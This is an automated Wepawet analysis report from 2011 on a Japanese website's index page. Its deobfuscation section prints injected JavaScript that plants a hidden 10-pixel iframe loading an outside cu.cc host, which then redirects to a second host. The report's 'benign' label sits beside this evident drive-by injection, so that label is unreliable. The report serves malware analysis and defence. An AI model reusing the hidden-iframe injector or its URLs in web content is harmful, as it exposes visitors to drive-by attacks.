Wepawet (alpha)

Home | About | Sample Reports | Support | Tools | News

Analysis report for http://www.ganbanyoku-tsubaki.jp/index.html

Sample Overview

URL	http://www.ganbanyoku-tsubaki.jp/index.html
MD5	5f373b85a47fb95b5c0d1c2c4e778273
Analysis Started	2011-08-01 08:07:23
Report Generated	2011-08-01 08:07:59
Jsand version	1.3.2

See the report for domain www.ganbanyoku-tsubaki.jp.

Detection results

Detector	Result
Jsand 1.3.2	benign

Exploits

No exploits were identified.

Deobfuscation results

Evals

• if (document.getElementsByTagName('body')[0]){
    iframer();
  }
  else {
    document.write("
  <iframe src='http://pzjqdclj.cz.cc/count20.php' width='10' height='10' style='visibility:h
  idden;position:absolute;left:0;top:0;'></iframe>");
  }
  function iframer(){
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://pzjqdclj.cz.cc/count20.php');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
  }
  

  (repeated 1 time)

• var goog$calendar$GdataRequest$callback
  

  (repeated 2 times)

• var _ShowPerf
  

  (repeated 2 times)

Writes

• <script language="VBScript">
  

  (repeated 1 time)

• OnErrorResumeNext
  

  (repeated 1 time)

• Dimax
  

  (repeated 1 time)

• ax = False
  

  (repeated 1 time)

• ax = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.6")))
  

  (repeated 1 time)

• </script>
  

  (repeated 1 time)

• <img src='http://www.ganbanyoku-tsubaki.jp/cgi-bin/ganbanyoku/log_note.cgi?page_name=00&
  

  (repeated 1 time)

• Win32
  

  (repeated 1 time)

•  & amp ;& amp;
  http :// www.ganbanyoku - tsubaki.jp / index.html
  

  (repeated 1 time)

• 'width = 0height = 0 > 
  

  (repeated 1 time)

• <font size="-1" color="red">Flashプラグインがないので、<br>再生出来ません。<br><a href=
  "http://www.adobe.com/jp/downloads/" target="Flash">ダウンロード</a></font>
  

  (repeated 1 time)

Network Activity

Requests

URL	Status	Content Type
http://www.ganbanyoku-tsubaki.jp/index.html	200	text/html
http://www.ganbanyoku-tsubaki.jp/common.js	200	text/x-js
about:blank	200	text/html
http://pzjqdclj.cz.cc/count20.php	302	text/html
http://simoncudby.cu.cc/showthread.php?t=90140028	404	application/x-empty
https://www.google.com/calendar/embed?showNav=0&showTabs=0&showCalendars=0&showTz=0&height=500&wkst=1&bgcolor=#ffccff&src=dcen3jh7fb2t1fs8fv3f0edsk8@group.calendar.google.com&color=#0D7813&src=p#weather@group.v.calendar.google.com&color=#2952A3&src=ja.japanese#holiday@group.v.calendar.google.com&color=#A32929&ctz=Asia/Tokyo	200	text/javascript
https://www.google.com/calendar/435ba7a4e2f1a410e67bcff4ba4f2bd7embedcompiled__en.js	200	text/javascript
https://www.google.com/calendar/435ba7a4e2f1a410e67bcff4ba4f2bd7embedcompiled_fastui.css	200	text/javascript
http://www.ganbanyoku-tsubaki.jp/undefined	404	text/xml

Redirects

From	To
http://pzjqdclj.cz.cc/count20.php	http://simoncudby.cu.cc/showthread.php?t=90140028

ActiveX controls

• Microsoft.XMLHTTP
  No attribute setting or method call detected

Shellcode and Malware

No shellcode was identified.

No additional malware was retrieved.

© 2008–2010 UCSB Computer Security Lab